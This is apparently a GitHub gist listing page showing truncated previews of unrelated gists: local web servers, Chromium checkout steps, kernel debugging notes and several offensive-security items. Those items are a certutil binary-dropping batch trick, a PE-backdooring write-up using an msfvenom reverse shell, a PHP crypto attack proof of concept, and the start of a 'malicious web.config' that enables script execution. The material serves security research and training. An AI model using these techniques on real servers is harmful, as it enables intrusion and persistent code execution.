Jusmistic jusmistic

🏠
Working from home
View GitHub Profile
@19WAS85
19WAS85 / powershell-web-server.ps1
Last active May 24, 2024 15:47
A simple web server built with powershell.
# This is a super **SIMPLE** example of how to create a very basic powershell webserver
# 2019-05-18 UPDATE — Created by me and evaluated by @jakobii and the community.
# Http Server
$http = [System.Net.HttpListener]::new()
# Hostname and port to listen on
$http.Prefixes.Add("http://localhost:8080/")
# Start the Http Server
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.xml with the following command:
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
# python simple-https-server.py
# then in your browser, visit:
# https://localhost:4443
import BaseHTTPServer, SimpleHTTPServer
import ssl
@jjgod
jjgod / checkout-chromium-release-branches.markdown
Last active January 12, 2024 09:30
Steps to checkout Chromium release branches

Steps to checkout Chromium release branches

Initial setup

mkdir chromium && cd chromium
fetch --nohooks chromium --nosvn=True
gclient sync --with_branch_heads --nohooks # May not even need this.

Fetching/updating a specific release branch

@defuse
defuse / attack.php
Last active October 2, 2023 21:27
PoC: Attack Against PHP Crypto
<?php
/*
* This code is copied from
* http://www.warpconduit.net/2013/04/14/highly-secure-data-encryption-decryption-made-easy-with-php-mcrypt-rijndael-256-and-cbc/
* to demonstrate an attack against it. Specifically, we simulate a timing leak
* in the MAC comparison which, in a Mac-then-Encrypt (MtA) design, we show
* breaks confidentiality.
*
* Slight modifications such as making it not serialize/unserialize and removing
@mattifestation
mattifestation / drop_binary.bat
Created July 12, 2015 05:49
Drop binary data from the command line w/o needing PowerShell
echo -----BEGIN CERTIFICATE----- > encoded.txt
echo Just Base64 encode your binary data
echo TVoAAA== >> encoded.txt
echo -----END CERTIFICATE----- >> encoded.txt
certutil -decode encoded.txt decoded.bin
$ sudo nano /etc/systemd/system/startup.service
[Unit]
Description=Startup
[Service]
ExecStart=/usr/local/bin/startup.sh
[Install]
WantedBy=default.target
@mgeeky
mgeeky / msfvenom-reverse-tcp-WaitForSingleObject.md
Last active November 14, 2023 19:45
(OSCE/CTP, Module #3: Backdooring PE Files) Document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches.

Looking for WaitForSingleObject call within modern msfvenom generated payload.


Abstract

This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment and WaitForSingleObject locating & patching. It was written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching the problem of finding this particular Windows API. Since RE is one of my stronger FU's, I decided to write down my explanation of the subject.

Contents:

@cji
cji / win_vm_kerneldbg.md
Last active April 30, 2021 13:07
Steps to successfully debug the Windows kernel between 2 VMWare VMs

Open the debugger VM's .vmx file, delete the existing serial0 lines (used for printing, not needed) and add these lines:

serial0.present = "TRUE"
serial0.pipe.endPoint = "client"
serial0.fileType = "pipe"
serial0.yieldOnMsrRead = "TRUE"
serial0.tryNoRxLoss = "FALSE"
serial0.startConnected = "TRUE"
@gazcbm
gazcbm / downloader web.config
Created July 11, 2018 23:00
Malicious web.config's
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
@ppmotskula
ppmotskula / piactl
Last active September 25, 2023 11:19
piactl -- install, configure and control CNIL's PIA software
#!/bin/bash
ABOUT="piactl 0.10
Copyright (c) 2018-2020 Peeter P. Mõtsküla <peeterpaul@motskula.net>
https://gist.github.com/ppmotskula/4288167460de27d22225e4959c44c6c4
License: MIT License (https://opensource.org/licenses/MIT)
piactl helps you to install, configure and control CNIL's PIA software
(https://www.cnil.fr/en/open-source-pia-software-helps-carry-out-data-protection-impact-assesment)